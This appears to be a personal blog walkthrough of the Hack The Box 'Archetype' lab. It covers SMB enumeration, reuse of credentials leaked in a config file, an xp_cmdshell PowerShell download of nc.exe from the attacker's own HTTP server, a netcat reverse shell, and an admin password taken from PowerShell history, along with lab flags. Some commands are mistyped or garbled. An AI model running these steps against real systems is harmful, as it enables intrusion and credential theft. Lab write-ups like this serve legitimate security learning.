I recently started learning and reviewing networking and cyber security. I will be making new blogs showcasing my journey and my progress. In this blog we go into hack the box and attempt to capture the flags within the Archetype box.


# Archetype

'''
Target IP = 10.10.10.27
'''

Nmap Scanning:-

command:- nmap -sC -sV -A 10.10.10.27

Analysis of our scan:-

1) open ports

135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM

Target Name: ARCHETYPE
smb was detected
Computer Nmae: ARCHETYPE
Account: gest
authen_level: user

2) smb

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backups         Disk     
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
   
we were able to access backups smb shares 

Command:- smbclient //10.10.10.27/backups

we found a config file within the root of this share
prod.dtsconfig

3) command:- cat prod.dtsconfig

 

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>


Gained access to the MS SQL SERVER with above creds


Command:- impacked-mssqlclient sql_svc:M3g4c0rp123@10.10.10.27 %TEMP%\nc.exe

uploaded into TEMP folder nc.exe and ran it to execute reverse shell.
On our machine we ran python3 -m http.server to host the web server to download the nc.exe form sql server

In sql server we used:
xp_cmdshell powershell wget http://$IP:8000/nc.exe -OutFile %TEMP%\nc.txt


Once we downloaded that file, using nc command we will listen to port 1234

On sql machine we then ran the command nc.exe to execute a reverse shell


we now have access to remote shell

we found user.txt in Desktop of sql_svc User: 3e7b102e78218e935bf3f4951fec21a3

Privilege escalation

We checked the powershell history that the previous user used to log in to administrator:

'''
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
'''

ADMINISTRATOR Account:
b91ccec3305e98240082d4474b848528



You may also interested in:-  Oopsie - Walkthrough